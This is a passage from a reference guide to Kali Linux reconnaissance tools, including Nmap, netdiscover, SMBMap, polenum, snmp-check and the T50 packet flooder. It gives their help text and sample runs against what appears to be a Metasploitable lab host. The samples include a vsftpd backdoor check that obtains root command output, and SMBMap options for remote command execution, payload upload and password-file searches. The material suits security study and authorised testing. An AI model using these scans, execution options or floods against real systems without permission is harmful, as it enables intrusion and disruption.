-p <n> bind to UDP Port <n> (default=0)
-m include MAC address in response (implied by '-f')
-T <n> Timeout the no-responses in <n> seconds (default=2 secs)
-w <n> Wait <n> msecs after each write (default=10 ms)
-t <n> Try each address <n> tries (default=1)
-P generate results in perl hashref format
■ Example
root@kali:~# nbtscan-unixwiz -f 192.168.11.4
192.168.11.4 WORKGROUP\600E54EA9E5E SHARING
600E54EA9E5E <00> UNIQUE Workstation Service
600E54EA9E5E <03> UNIQUE Messenger Service<3>
600E54EA9E5E <20> UNIQUE File Server Service
..__MSBROWSE__.<01> GROUP Master Browser
WORKGROUP <00> GROUP Domain Name
WORKGROUP <1d> UNIQUE Master Browser
WORKGROUP <1e> GROUP Browser Service Elections
dc:fb:48:75:75:0b ETHER server4test.local-net
Netdiscover
Sends ARP requests on the local network to discover hosts (or, with -p, only listens for ARP traffic). Because it works at layer 2 it finds hosts that drop ICMP and TCP probes, but only on the directly attached segment.
■ Usage
root@kali:~# netdiscover -h
Usage: netdiscover [-i device] [-r range | -l file | -p] [-m file] [-F filter] [-s time] [-c count] [-n node] [-dfPLNS]
-i device: your network device
-r range: scan a given range instead of auto scan. 192.168.6.0/24,/16,/8
-l file: scan the list of ranges contained into the given file
-p passive mode: do not send anything, only sniff
-m file: scan a list of known MACs and host names
-F filter: customize pcap filter expression (default: "arp")
-s time: time to sleep between each ARP request (milliseconds)
-c count: number of times to send each ARP request (for nets with packet loss)
-n node: last source IP octet used for scanning (from 2 to 253)
-d ignore home config files for autoscan and fast mode
-f enable fastmode scan, saves a lot of time, recommended for auto
-P print results in a format suitable for parsing by another program and stop after active scan
-L similar to -P but continue listening after the active scan is completed
-N Do not print header. Only valid when -P or -L is enabled.
-S enable sleep time suppression between each request (hardcore mode)
If -r, -l or -p are not enabled, netdiscover will scan for common LAN addresses.
■ Usage example
root@kali:~# netdiscover -i eth0 -r 192.168.11.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
6 Captured ARP Req/Rep packets, from 4 hosts. Total size: 360
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.11.1 d4:2c:46:be:0f:60 3 180 BUFFALO.INC
192.168.11.4 dc:a2:66:20:35:65 1 60 Hon Hai Precision Ind., Co., Ltd.
192.168.11.3 dc:fb:48:75:75:0b 1 60 Intel Corporate
192.168.11.5 68:9a:87:cb:db:8a 1 60 Amazon Technologies Inc.
netscanner
Lets you discover hosts on the network, dump packets, scan ports and more from a GUI-like (text-based) interface.
■ Usage
root@kali:~# netscanner --help
Usage: netscanner [OPTIONS]
Options:
-t, --tick-rate <FLOAT> Tick rate, i.e. number of ticks per second [default: 1]
-f, --frame-rate <FLOAT> Frame rate, i.e. number of frames per second [default: 10]
-h, --help Print help
-V, --version Print version
■ Usage example
root@kali:~# netscanner
Running the command displays a GUI-style screen in the CLI.
Switch between screens to view packet dumps, port scan results and so on.
nextnet
Searches the network for hosts running NetBIOS.
■ Usage
root@kali:~# nextnet --help
Usage: nextnet [cidr] ... [cidr]
Options:
-rate int
Set the maximum packets per second rate (default 1000)
-version
Show the application version
■ Usage example
root@kali:~# nextnet 192.168.11.0/24
{"host":"192.168.11.4","port":"137","proto":"udp","probe":"netbios","name":"B776FBD9255F","nets":["192.168.11.4"],"info":{"domain":"WORKGROUP"}}
Nmap
A network scanner that supports many port scanning techniques, version detection and TCP/IP fingerprinting.
■ Usage
root@kali:~# nmap
Usage: nmap [Scan Type(s)] [Options] {target specification}
TARGET SPECIFICATION:
Can pass hostnames, IP addresses, networks, etc.
Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254
-iL <inputfilename>: Input from list of hosts/networks
-iR <num hosts>: Choose random targets
--exclude <host1[,host2][,host3],...>: Exclude hosts/networks
--excludefile <exclude_file>: Exclude list from file
HOST DISCOVERY:
-sL: List Scan - simply list targets to scan
-sn: Ping Scan - disable port scan
-Pn: Treat all hosts as online -- skip host discovery
-PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports
-PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes
-PO[protocol list]: IP Protocol Ping
-n/-R: Never do DNS resolution/Always resolve [default: sometimes]
--dns-servers <serv1[,serv2],...>: Specify custom DNS servers
--system-dns: Use OS's DNS resolver
--traceroute: Trace hop path to each host
SCAN TECHNIQUES:
-sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
-sU: UDP Scan
-sN/sF/sX: TCP Null, FIN, and Xmas scans
--scanflags <flags>: Customize TCP scan flags
-sI <zombie host[:probeport]>: Idle scan
-sY/sZ: SCTP INIT/COOKIE-ECHO scans
-sO: IP protocol scan
-b <FTP relay host>: FTP bounce scan
PORT SPECIFICATION AND SCAN ORDER:
-p <port ranges>: Only scan specified ports
Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080,S:9
--exclude-ports <port ranges>: Exclude the specified ports from scanning
-F: Fast mode - Scan fewer ports than the default scan
-r: Scan ports sequentially - don't randomize
--top-ports <number>: Scan <number> most common ports
--port-ratio <ratio>: Scan ports more common than <ratio>
SERVICE/VERSION DETECTION:
-sV: Probe open ports to determine service/version info
--version-intensity <level>: Set from 0 (light) to 9 (try all probes)
--version-light: Limit to most likely probes (intensity 2)
--version-all: Try every single probe (intensity 9)
--version-trace: Show detailed version scan activity (for debugging)
SCRIPT SCAN:
-sC: equivalent to --script=default
--script=<Lua scripts>: <Lua scripts> is a comma separated list of
directories, script-files or script-categories
--script-args=<n1=v1,[n2=v2,...]>: provide arguments to scripts
--script-args-file=filename: provide NSE script args in a file
--script-trace: Show all data sent and received
--script-updatedb: Update the script database.
--script-help=<Lua scripts>: Show help about scripts.
<Lua scripts> is a comma-separated list of script-files or
script-categories.
OS DETECTION:
-O: Enable OS detection
--osscan-limit: Limit OS detection to promising targets
--osscan-guess: Guess OS more aggressively
TIMING AND PERFORMANCE:
Options which take <time> are in seconds, or append 'ms' (milliseconds),
's' (seconds), 'm' (minutes), or 'h' (hours) to the value (e.g. 30m).
-T<0-5>: Set timing template (higher is faster)
--min-hostgroup/max-hostgroup <size>: Parallel host scan group sizes
--min-parallelism/max-parallelism <numprobes>: Probe parallelization
--min-rtt-timeout/max-rtt-timeout/initial-rtt-timeout <time>: Specifies
probe round trip time.
--max-retries <tries>: Caps number of port scan probe retransmissions.
--host-timeout <time>: Give up on target after this long
--scan-delay/--max-scan-delay <time>: Adjust delay between probes
--min-rate <number>: Send packets no slower than <number> per second
--max-rate <number>: Send packets no faster than <number> per second
FIREWALL/IDS EVASION AND SPOOFING:
-f; --mtu <val>: fragment packets (optionally w/given MTU)
-D <decoy1,decoy2[,ME],...>: Cloak a scan with decoys
-S <IP_Address>: Spoof source address
-e <iface>: Use specified interface
-g/--source-port <portnum>: Use given port number
--proxies <url1,[url2],...>: Relay connections through HTTP/SOCKS4 proxies
--data <hex string>: Append a custom payload to sent packets
--data-string <string>: Append a custom ASCII string to sent packets
--data-length <num>: Append random data to sent packets
--ip-options <options>: Send packets with specified ip options
--ttl <val>: Set IP time-to-live field
--spoof-mac <mac address/prefix/vendor name>: Spoof your MAC address
--badsum: Send packets with a bogus TCP/UDP/SCTP checksum
OUTPUT:
-oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3,
and Grepable format, respectively, to the given filename.
-oA <basename>: Output in the three major formats at once
-v: Increase verbosity level (use -vv or more for greater effect)
-d: Increase debugging level (use -dd or more for greater effect)
--reason: Display the reason a port is in a particular state
--open: Only show open (or possibly open) ports
--packet-trace: Show all packets sent and received
--iflist: Print host interfaces and routes (for debugging)
--append-output: Append to rather than clobber specified output files
--resume <filename>: Resume an aborted scan
--noninteractive: Disable runtime interactions via keyboard
--stylesheet <path/URL>: XSL stylesheet to transform XML output to HTML
--webxml: Reference stylesheet from Nmap.Org for more portable XML
--no-stylesheet: Prevent associating of XSL stylesheet w/XML output
MISC:
-6: Enable IPv6 scanning
-A: Enable OS detection, version detection, script scanning, and traceroute
--datadir <dirname>: Specify custom Nmap data file location
--send-eth/--send-ip: Send using raw ethernet frames or IP packets
--privileged: Assume that the user is fully privileged
--unprivileged: Assume the user lacks raw socket privileges
-V: Print version number
-h: Print this help summary page.
■ Usage example
# Port scan + enable OS and software version detection
root@kali:~# nmap -A -T4 192.168.11.4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-30 09:28 UTC
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.11.4
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
|_ SSL2_RC4_128_WITH_MD5
|_ssl-date: 2024-10-30T09:31:52+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after: 2010-04-16T14:07:45
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
[...]
# Check for firewall filtering with an ACK scan
root@kali:~# nmap -sA --top-ports 10 192.168.11.4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-31 00:03 UTC
PORT STATE SERVICE
21/tcp unfiltered ftp
22/tcp unfiltered ssh
23/tcp filtered telnet
25/tcp unfiltered smtp
80/tcp unfiltered http
110/tcp unfiltered pop3
139/tcp unfiltered netbios-ssn
443/tcp unfiltered https
445/tcp unfiltered microsoft-ds
3389/tcp unfiltered ms-wbt-server
# Port scan + enable detection of software vulnerabilities
root@kali:~# nmap --script=vuln 192.168.11.4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-30 09:18 UTC
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 64
| ftp-vsftpd-backdoor:
| VULNERABLE:
| vsFTPd version 2.3.4 backdoor
| State: VULNERABLE (Exploitable)
| IDs: BID:48539 CVE:CVE-2011-2523
| vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.
| Disclosure date: 2011-07-03
| Exploit results:
| Shell command: id
| Results: uid=0(root) gid=0(root)
| References:
| https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
| http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
| https://www.securityfocus.com/bid/48539
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523
22/tcp open ssh syn-ack ttl 64
23/tcp open telnet syn-ack ttl 64
25/tcp open smtp syn-ack ttl 64
|_sslv2-drown: ERROR: Script execution failed (use -d to debug)
| ssl-dh-params:
| VULNERABLE:
| Anonymous Diffie-Hellman Key Exchange MitM Vulnerability
| State: VULNERABLE
| Transport Layer Security (TLS) services that use anonymous
| Diffie-Hellman key exchange only provide protection against passive
| eavesdropping, and are vulnerable to active man-in-the-middle attacks
| which could completely compromise the confidentiality and integrity
| of any data exchanged over the resulting session.
| Check results:
[...]
NmapSI4
Lets you operate Nmap and review its results from a GUI.
■ Usage example
Pnscan
Performs fast, multi-threaded port scans of large networks.
■ Usage
root@kali:~# pnscan -h
Usage: pnscan [<options>] [{<CIDR>|<host-range> <port-range>} | <service>]
Command line options:
-h Display this information.
-V Print version.
-v Be verbose.
-d Print debugging info.
-s Lookup and print hostnames.
-i Ignore case when scanning responses.
-S Enable shutdown mode.
-l Line oriented output.
-w<string> Request string to send.
-W<hex list> Hex coded request string to send.
-r<string> Response string to look for.
-R<hex list> Hex coded response string to look for.
-L<length> Max bytes to print.
-t<msecs> Connect/Write/Read timeout.
-n<workers> Concurrent worker threads limit.
■ Usage example
root@kali:~# pnscan 192.168.11.0/24 20:25
192.168.11.4 : 21 : TXT : 220 (vsFTPd 2.3.4)\r\n
192.168.11.4 : 23 : TEL : <IAC><DO>\x18<IAC><DO> <IAC><DO>#<IAC><DO>
192.168.11.4 : 22 : TXT : SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1\n
192.168.11.5 : 22 : TXT : SSH-2.0-OpenSSH_9.9p1 Debian-3\r\n
192.168.11.4 : 25 : TXT : 220 kali.localdomain ESMTP Postfix (Ubuntu)\r\n
polenum
Extracts the password policy from a domain controller.
■ Usage
root@kali:~# polenum --help
usage: polenum [-h] [--username USERNAME] [--password PASSWORD] [--domain DOMAIN] [--protocols [PROTOCOLS ...]] [enum4linux]
positional arguments:
enum4linux username:password@IPaddress
options:
-h, --help show this help message and exit
--username USERNAME, -u USERNAME
The specified username
--password PASSWORD, -p PASSWORD
The password of the user
--domain DOMAIN, -d DOMAIN
The domain or IP
--protocols [PROTOCOLS ...]
['139/SMB', '445/SMB']
■ Usage example
root@kali:~# polenum hello:HelloWorld123@192.168.11.4
[+] Attaching to 192.168.11.4 using hello:HelloWorld123
[+] Trying protocol 139/SMB...
[+] Found domain(s):
[+] EXAMPLE
[+] BUILTIN
[+] Password Info for Domain: EXAMPLE
[+] Minimum password length: 7
[+] Password history length: 24
[+] Maximum password age: 41 days 23 hours 53 minutes
[+] Password Complexity Flags: 000001
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 1
[+] Minimum password age: 1 day 4 minutes
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
SMBMap
Enumerates network shared folders (SMB).
■ Usage
root@kali:~# smbmap --help
usage: smbmap [-h] (-H HOST | --host-file FILE) [-u USERNAME] [-p PASSWORD | --prompt] [-k] [--no-pass] [--dc-ip IP or Host]
[-s SHARE] [-d DOMAIN] [-P PORT] [-v] [--signing] [--admin] [--no-banner] [--no-color] [--no-update]
[--timeout SCAN_TIMEOUT] [-x COMMAND] [--mode CMDMODE] [-L | -r [PATH]] [-g FILE | --csv FILE] [--dir-only]
[--no-write-check] [-q] [--depth DEPTH] [--exclude SHARE [SHARE ...]] [-A PATTERN] [-F PATTERN]
[--search-path PATH] [--search-timeout TIMEOUT] [--download PATH] [--upload SRC DST] [--delete PATH TO FILE]
[--skip]
options:
-h, --help show this help message and exit
Main arguments:
-H HOST IP or FQDN
--host-file FILE File containing a list of hosts
-u USERNAME, --username USERNAME
Username, if omitted null session assumed
-p PASSWORD, --password PASSWORD
Password or NTLM hash, format is LMHASH:NTHASH
--prompt Prompt for a password
-s SHARE Specify a share (default C$), ex 'C$'
-d DOMAIN Domain name (default WORKGROUP)
-P PORT SMB port (default 445)
-v, --version Return the OS version of the remote host
--signing Check if host has SMB signing disabled, enabled, or required
--admin Just report if the user is an admin
--no-banner Removes the banner from the top of the output
--no-color Removes the color from output
--no-update Removes the "Working on it" message
--timeout SCAN_TIMEOUT
Set port scan socket timeout. Default is .5 seconds
Kerberos settings:
-k, --kerberos Use Kerberos authentication
--no-pass Use CCache file (export KRB5CCNAME='~/current.ccache')
--dc-ip IP or Host IP or FQDN of DC
Command Execution:
Options for executing commands on the specified host
-x COMMAND Execute a command ex. 'ipconfig /all'
--mode CMDMODE Set the execution method, wmi or psexec, default wmi
Shard drive Search:
Options for searching/enumerating the share of the specified host(s)
-L List all drives on the specified host, requires ADMIN rights.
-r [PATH] Recursively list dirs and files (no share\path lists the root of ALL shares), ex. 'email/backup'
-g FILE Output to a file in a grep friendly format, used with -r (otherwise it outputs nothing), ex -g
grep_out.txt
--csv FILE Output to a CSV file, ex --csv shares.csv
--dir-only List only directories, ommit files.
--no-write-check Skip check to see if drive grants WRITE access.
-q Quiet verbose output. Only shows shares you have READ or WRITE on, and suppresses file listing when
performing a search (-A).
--depth DEPTH Traverse a directory tree to a specific depth. Default is 1 (root node).
--exclude SHARE [SHARE ...]
Exclude share(s) from searching and listing, ex. --exclude ADMIN$ C$'
-A PATTERN Define a file name pattern (regex) that auto downloads a file on a match (requires -r), not case
sensitive, ex '(web|global).(asax|config)'
File Content Search:
Options for searching the content of files (must run as root), kind of experimental
-F PATTERN File content search, -F '[Pp]assword' (requires admin access to execute commands, and PowerShell on
victim host)
--search-path PATH Specify drive/path to search (used with -F, default C:\Users), ex 'D:\HR\'
--search-timeout TIMEOUT
Specifcy a timeout (in seconds) before the file search job gets killed. Default is 300 seconds.
Filesystem interaction:
Options for interacting with the specified host's filesystem
--download PATH Download a file from the remote system, ex.'C$\temp\passwords.txt'
--upload SRC DST Upload a file to the remote system ex. '/tmp/payload.exe C$\temp\payload.exe'
--delete PATH TO FILE
Delete a remote file, ex. 'C$\temp\msf.exe'
--skip Skip delete file confirmation prompt
■ Usage example
root@kali:~# smbmap -u hello -p hello -H 192.168.11.4
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 192.168.11.4:445 Name: server4test.local Status: Authenticated
Disk Permissions Comment
---- ----------- -------
print$ READ ONLY Printer Drivers
tmp READ, WRITE oh noes!
opt READ ONLY
IPC$ NO ACCESS IPC Service (61154d1295a0 server (Samba 3.0.20-Debian))
ADMIN$ NO ACCESS IPC Service (61154d1295a0 server (Samba 3.0.20-Debian))
hello READ, WRITE Home Directories
[*] Closed 1 connections
Snmpcheck
Reads values from an SNMP agent and prints them in a readable format.
■ Usage
root@kali:~# snmp-check --help
snmp-check v1.9 - SNMP enumerator
Usage: snmp-check [OPTIONS] <target IP address>
-p --port : SNMP port. Default port is 161;
-c --community : SNMP community. Default is public;
-v --version : SNMP version (1,2c). Default is 1;
-w --write : detect write access (separate action by enumeration);
-d --disable_tcp : disable TCP connections enumeration!
-t --timeout : timeout in seconds. Default is 5;
-r --retries : request retries. Default is 1;
-i --info : show script version;
-h --help : show help menu;
■ Usage example
root@kali:~# snmp-check 192.168.11.4
[+] Try to connect to 192.168.11.4:161 using SNMPv1 and community 'public'
[*] System information:
Host IP address : 192.168.11.4
Hostname : 61154d1295a0
Description : Linux server4test 5.15.153.1 #1 SMP Fri Mar 29 23:14:13 UTC 2024 x86_64
Contact : msfdev@metasploit.com
Location : Metasploit Lab
Uptime snmp : 13:57:03.87
Uptime system : 00:00:58.58
System date : 2024-11-14 06:42:04.0
[...]
[*] TCP connections and listening ports:
Local address Local port Remote address Remote port State
0.0.0.0 21 0.0.0.0 0 listen
0.0.0.0 23 0.0.0.0 0 listen
0.0.0.0 25 0.0.0.0 0 listen
0.0.0.0 80 0.0.0.0 0 listen
0.0.0.0 111 0.0.0.0 0 listen
0.0.0.0 139 0.0.0.0 0 listen
0.0.0.0 445 0.0.0.0 0 listen
0.0.0.0 512 0.0.0.0 0 listen
0.0.0.0 513 0.0.0.0 0 listen
0.0.0.0 514 0.0.0.0 0 listen
0.0.0.0 1099 0.0.0.0 0 listen
[...]
[*] Storage information:
Description : ["Physical memory"]
Device id : [#<SNMP::Integer:0x00007f312a0025c8 @value=1>]
Filesystem type : ["unknown"]
Device unit : [#<SNMP::Integer:0x00007f312a000980 @value=1024>]
Memory size : 7.71 GB
Memory used : 1.66 GB
[...]
T50
A tool for crafting arbitrary data packets for stress testing and similar purposes. It supports multiple protocols, including standard protocols (ICMP, TCP, UDP), infrastructure-specific protocols (GRE, IPSec, RSVP) and routing protocols (RIP, EIGRP, OSPF).
■ Usage
root@kali:~# t50 --help
Usage: t50 <host[/cidr]> [options]
Common Options:
--threshold NUM Threshold of packets to send (default 1000)
--flood This option supersedes the 'threshold'
--encapsulated Encapsulated protocol (GRE) (default OFF)
-B,--bogus-csum Bogus checksum (default OFF)
--shuffle Shuffling for T50 protocol (default OFF)
-q,--quiet Disable INFOs
--turbo Extend the performance (default OFF)
-l,--list-protocols List all available protocols
-v,--version Print version and exit
-h,--help Display this help and exit
GRE Options:
--gre-seq-present GRE sequence # present (default OFF)
--gre-key-present GRE key present (default OFF)
--gre-sum-present GRE checksum present (default OFF)
--gre-key NUM GRE key (default RANDOM)
--gre-sequence NUM GRE sequence # (default RANDOM)
--gre-saddr ADDR GRE IP source IP address (default RANDOM)
--gre-daddr ADDR GRE IP destination IP address (default RANDOM)
DCCP/TCP/UDP Options:
--sport NUM DCCP|TCP|UDP source port (default RANDOM)
--dport NUM DCCP|TCP|UDP destination port (default RANDOM)
TCP Options:
--ack-seq NUM TCP ACK sequence # (default RANDOM)
--sequence NUM TCP SYN sequence # (default RANDOM)
--data-offset NUM TCP data offset (default 5)
-F,--fin TCP FIN flag (default OFF)
-S,--syn TCP SYN flag (default OFF)
-R,--rst TCP RST flag (default OFF)
-P,--psh TCP PSH flag (default OFF)
-A,--ack TCP ACK flag (default OFF)
-U,--urg TCP URG flag (default OFF)
-E,--ece TCP ECE flag (default OFF)
-C,--cwr TCP CWR flag (default OFF)
-W,--window NUM TCP Window size (default NONE)
--urg-pointer NUM TCP URG pointer (default NONE)
--mss NUM TCP Maximum Segment Size (default NONE)
--wscale NUM TCP Window Scale (default NONE)
--tstamp NUM:NUM TCP Timestamp (TSval:TSecr) (default NONE)
--sack-ok TCP SACK-Permitted (default OFF)
--ttcp-cc NUM T/TCP Connection Count (CC) (default NONE)
--ccnew NUM T/TCP Connection Count (CC.NEW) (default NONE)
--ccecho NUM T/TCP Connection Count (CC.ECHO) (default NONE)
--sack NUM:NUM TCP SACK Edges (Left:Right) (default NONE)
--md5-signature TCP MD5 signature included (default OFF)
--authentication TCP-AO authentication included (default OFF)
--auth-key-id NUM TCP-AO authentication key ID (default 1)
--auth-next-key NUM TCP-AO authentication next key (default 1)
--nop TCP No-Operation (default EOL)
IP Options:
-s,--saddr ADDR IP source IP address (default RANDOM)
--tos NUM IP type of service (default 0x40)
--id NUM IP identification (default RANDOM)
--frag-offset NUM IP fragmentation offset (default 0)
--ttl NUM IP time to live (default 255)
--protocol PROTO IP protocol (default TCP)
ICMP Options:
--icmp-type NUM ICMP type (default 8)
--icmp-code NUM ICMP code (default 0)
--icmp-gateway ADDR ICMP redirect gateway (default RANDOM)
--icmp-id NUM ICMP identification (default RANDOM)
--icmp-sequence NUM ICMP sequence # (default RANDOM)
EGP Options:
--egp-type NUM EGP type (default 3)
--egp-code NUM EGP code (default 3)
--egp-status NUM EGP status (default 1)
--egp-as NUM EGP autonomous system (default RANDOM)
--egp-sequence NUM EGP sequence # (default RANDOM)
--egp-hello NUM EGP hello interval (default RANDOM)
--egp-poll NUM EGP poll interval (default RANDOM)
RIP Options:
--rip-command NUM RIPv1/v2 command (default 2)
--rip-family NUM RIPv1/v2 address family (default 2)
--rip-address ADDR RIPv1/v2 router address (default RANDOM)
--rip-metric NUM RIPv1/v2 router metric (default RANDOM)
--rip-domain NUM RIPv2 router domain (default RANDOM)
--rip-tag NUM RIPv2 router tag (default RANDOM)
--rip-netmask ADDR RIPv2 router subnet mask (default RANDOM)
--rip-next-hop ADDR RIPv2 router next hop (default RANDOM)
--rip-authentication RIPv2 authentication included (default OFF)
--rip-auth-key-id NUM RIPv2 authentication key ID (default 1)
--rip-auth-sequence NUM RIPv2 authentication sequence # (default RANDOM)
DCCP Options:
--dccp-data-offset NUM DCCP data offset (default VARY)
--dccp-cscov NUM DCCP checksum coverage (default 0)
--dccp-ccval NUM DCCP HC-Sender CCID (default RANDOM)
--dccp-type NUM DCCP type (default 0)
--dccp-extended DCCP extend for sequence # (default OFF)
--dccp-sequence-1 NUM DCCP sequence # (default RANDOM)
--dccp-sequence-2 NUM DCCP extended sequence # (default RANDOM)
--dccp-sequence-3 NUM DCCP sequence # low (default RANDOM)
--dccp-service NUM DCCP service code (default RANDOM)
--dccp-acknowledge-1 NUM DCCP acknowledgment # high (default RANDOM)
--dccp-acknowledge-2 NUM DCCP acknowledgment # low (default RANDOM)
--dccp-reset-code NUM DCCP reset code (default RANDOM)
RSVP Options:
--rsvp-flags NUM RSVP flags (default 1)
--rsvp-type NUM RSVP message type (default 1)
--rsvp-ttl NUM RSVP time to live (default 254)
--rsvp-session-addr ADDR RSVP SESSION destination address (default RANDOM)
--rsvp-session-proto NUM RSVP SESSION protocol ID (default 1)
--rsvp-session-flags NUM RSVP SESSION flags (default 1)
--rsvp-session-port NUM RSVP SESSION destination port (default RANDOM)
--rsvp-hop-addr ADDR RSVP HOP neighbor address (default RANDOM)
--rsvp-hop-iface NUM RSVP HOP logical interface (default RANDOM)
--rsvp-time-refresh NUM RSVP TIME refresh interval (default 360)
--rsvp-error-addr ADDR RSVP ERROR node address (default RANDOM)
--rsvp-error-flags NUM RSVP ERROR flags (default 2)
--rsvp-error-code NUM RSVP ERROR code (default 2)
--rsvp-error-value NUM RSVP ERROR value (default 8)
--rsvp-scope NUM RSVP SCOPE # of address(es) (default 1)
--rsvp-address ADDR,... RSVP SCOPE address(es) (default RANDOM)
--rsvp-style-option NUM RSVP STYLE option vector (default 18)
--rsvp-sender-addr ADDR RSVP SENDER TEMPLATE address (default RANDOM)
--rsvp-sender-port NUM RSVP SENDER TEMPLATE port (default RANDOM)
--rsvp-tspec-traffic RSVP TSPEC service traffic (default OFF)
--rsvp-tspec-guaranteed RSVP TSPEC service guaranteed (default OFF)
--rsvp-tspec-r NUM RSVP TSPEC token bucket rate (default RANDOM)
--rsvp-tspec-b NUM RSVP TSPEC token bucket size (default RANDOM)
--rsvp-tspec-p NUM RSVP TSPEC peak data rate (default RANDOM)
--rsvp-tspec-m NUM RSVP TSPEC minimum policed unit (default RANDOM)
--rsvp-tspec-M NUM RSVP TSPEC maximum packet size (default RANDOM)
--rsvp-adspec-ishop NUM RSVP ADSPEC IS HOP count (default RANDOM)
--rsvp-adspec-path NUM RSVP ADSPEC path b/w estimate (default RANDOM)
--rsvp-adspec-m NUM RSVP ADSPEC minimum path latency (default RANDOM)
--rsvp-adspec-mtu NUM RSVP ADSPEC composed MTU (default RANDOM)
--rsvp-adspec-guaranteed RSVP ADSPEC service guaranteed (default OFF)
--rsvp-adspec-Ctot NUM RSVP ADSPEC ETE composed value C (default RANDOM)
--rsvp-adspec-Dtot NUM RSVP ADSPEC ETE composed value D (default RANDOM)
--rsvp-adspec-Csum NUM RSVP ADSPEC SLR point composed C (default RANDOM)
--rsvp-adspec-Dsum NUM RSVP ADSPEC SLR point composed D (default RANDOM)
--rsvp-adspec-controlled RSVP ADSPEC service controlled (default OFF)
--rsvp-confirm-addr ADDR RSVP CONFIRM receiver address (default RANDOM)
IPSEC Options:
--ipsec-ah-length NUM IPSec AH header length (default NONE)
--ipsec-ah-spi NUM IPSec AH SPI (default RANDOM)
--ipsec-ah-sequence NUM IPSec AH sequence # (default RANDOM)
--ipsec-esp-spi NUM IPSec ESP SPI (default RANDOM)
--ipsec-esp-sequence NUM IPSec ESP sequence # (default RANDOM)
EIGRP Options:
--eigrp-opcode NUM EIGRP opcode (default 1)
--eigrp-flags NUM EIGRP flags (default RANDOM)
--eigrp-sequence NUM EIGRP sequence # (default RANDOM)
--eigrp-acknowledge NUM EIGRP acknowledgment # (default RANDOM)
--eigrp-as NUM EIGRP autonomous system (default RANDOM)
--eigrp-type NUM EIGRP type (default 258)
--eigrp-length NUM EIGRP length (default NONE)
--eigrp-k1 NUM EIGRP parameter K1 value (default 1)
--eigrp-k2 NUM EIGRP parameter K2 value (default 0)
--eigrp-k3 NUM EIGRP parameter K3 value (default 1)
--eigrp-k4 NUM EIGRP parameter K4 value (default 0)
--eigrp-k5 NUM EIGRP parameter K5 value (default 0)
--eigrp-hold NUM EIGRP parameter hold time (default 360)
--eigrp-ios-ver NUM.NUM EIGRP IOS release version (default 12.4)
--eigrp-rel-ver NUM.NUM EIGRP PROTO release version (default 1.2)
--eigrp-next-hop ADDR EIGRP [in|ex]ternal next-hop (default RANDOM)
--eigrp-delay NUM EIGRP [in|ex]ternal delay (default RANDOM)
--eigrp-bandwidth NUM EIGRP [in|ex]ternal bandwidth (default RANDOM)
--eigrp-mtu NUM EIGRP [in|ex]ternal MTU (default 1500)
--eigrp-hop-count NUM EIGRP [in|ex]ternal hop count (default RANDOM)
--eigrp-load NUM EIGRP [in|ex]ternal load (default RANDOM)
--eigrp-reliability NUM EIGRP [in|ex]ternal reliability (default RANDOM)
--eigrp-daddr ADDR/CIDR EIGRP [in|ex]ternal address(es) (default RANDOM)
--eigrp-src-router ADDR EIGRP external source router (default RANDOM)
--eigrp-src-as NUM EIGRP external autonomous system (default RANDOM)
--eigrp-tag NUM EIGRP external arbitrary tag (default RANDOM)
--eigrp-proto-metric NUM EIGRP external protocol metric (default RANDOM)
--eigrp-proto-id NUM EIGRP external protocol ID (default 2)
--eigrp-ext-flags NUM EIGRP external flags (default RANDOM)
--eigrp-address ADDR EIGRP multicast sequence address (default RANDOM)
